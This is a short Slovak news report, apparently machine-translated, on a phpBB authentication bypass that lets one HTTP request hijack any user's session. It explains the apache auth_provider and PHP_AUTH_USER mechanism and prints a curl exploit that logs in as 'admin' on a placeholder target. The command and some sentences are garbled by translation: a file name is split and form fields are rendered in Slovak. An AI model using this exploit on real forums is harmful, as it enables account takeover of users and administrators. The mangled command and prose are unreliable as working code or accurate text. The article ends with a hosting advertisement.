Zraniteľnosť v phpBB umožňuje prístup k akémukoľvek účtu bez overenia.

V open-source fórovom engine phpBB bola objavená zraniteľnosť. Táto zraniteľnosť umožňuje jednému HTTP požiadavke pripojiť sa k relácii ľubovoľného používateľa fóra. Zraniteľnosť ovplyvňuje predvolenú konfiguráciu phpBB. Problém bol opravený vo verzii phpBB 3.3.17.

Útoky na bežných používateľov môžu viesť k prístupu k súkromným správam a možnosti odosielať správy v ich mene. Útoky na moderátorov a administrátorov môžu viesť k vymazaniu správ iných ľudí, prezeraniu... IP adresy a e-mail, čítať súkromnú korešpondenciu, ale nemôžete sa prihlásiť do administrátorského rozhrania a získať prístup k hostiteľovi.

Podrobnosti o zraniteľnosti nie sú poskytnuté, ale pomocou umelej inteligencie založenej na záplate už bola znovu vytvorená metóda zneužitia. Táto metóda zneužitia volá obslužný program „login_link“, nastaví metódu autentifikácie na „auth_provider=apache“ a nahradí prihlásenie pomocou základného overenia. PHP potom nastaví premennú prostredia „PHP_AUTH_USER=login“ a phpBB z nej extrahuje prihlasovacie meno používateľa bez overenia hesla. Napríklad, ak chcete získať ID relácie používateľa „admin“ a uložiť ho do súboru cookies.txt, môžete spustiť nasledujúci kód:

curl -i -s \
-c súbory cookie.txt \
-b súbory cookie.txt \
-u 'admin:čokoľvek' \
-d 'login=Prihlásenie&prihlasovacie_meno=admin&prihlasovacie_heslo=akýkoľvek' \
„https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1“

Zdroj: opennet.ru

Kúpte si spoľahlivý hosting pre stránky s DDoS ochranou, VPS VDS servery 🔥 Kúpte si spoľahlivý webhosting s ochranou DDoS, VPS VDS servery | ProHoster